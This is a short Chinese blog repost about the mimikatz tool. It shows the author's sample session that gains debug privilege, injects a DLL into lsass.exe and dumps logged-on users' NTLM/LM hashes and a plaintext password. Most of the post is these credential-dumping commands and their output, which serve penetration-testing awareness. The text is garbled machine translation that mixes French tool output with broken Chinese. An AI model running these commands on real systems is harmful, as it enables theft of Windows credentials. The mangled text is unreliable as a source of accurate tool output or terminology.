我不久前打算在博客上写这篇文章,但从未接触过它。
这是一篇关于mimikatz工具非常酷的功能的简短帖子。
我非常感谢该工具的作者引起了我的注意。在那之前,我没有意识到有可能恢复登录的Windows用户的明文密码。我确信大多数测试者会发现非常有用的东西。
以下是作者提供的一些示例输出:
mimikatz 1.0 x86(pre-alpha)/ * Traitement du Kiwi * /
mimikatz#privilege :: debug
Demande d’ACTIVATIONduprivilège:SeDebugPrivilege:好的
mimikatz #injection ::进程lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client …
Serveurconnectéàunclient!
Message du processus:
Bienvenue dans un processus遥远
Gentil Kiwi
SekurLSA:librairie de manipulationdesdonnéesdesécuritésdansLSASS
mimikatz#@ getLogonPasswords
认证身份Id:0; 434898
包裹认证:NTLM
Utilisateur负责人:Gentil用户
Domaine d’authentification:vm-w7-ult
msv1_0:lm {e52cac67419a9a224a3b108f3fa6cb6d},ntlm {8846f7eaee8fb117ad06bdd830b7586c}
wdigest:密码
tspkg:密码
认证身份Id:0; 269806
包裹认证:NTLM
Utilisateur负责人:Gentil Kiwi
Domaine d’authentification:vm-w7-ult
msv1_0:lm {d0e9aee149655a6075e4540af1f22d3b},ntlm {cc36cf7a8514893efccd332446158b1a}
wdigest:waza1234 /
tspkg:waza1234 /
我想知道为什么明文密码需要存储在LSASS中 – 毕竟每个测试者都会告诉你不需要密码进行身份验证,只需要哈希。
一些谷歌搜索似乎表明需要wdigest(密码)来支持HTTP摘要身份验证和其他需要验证方知道密码的方案 – 而不仅仅是哈希。
转载请注明:XAMPP中文组官网 » mimikatz_从Lsass恢复明文密码的工具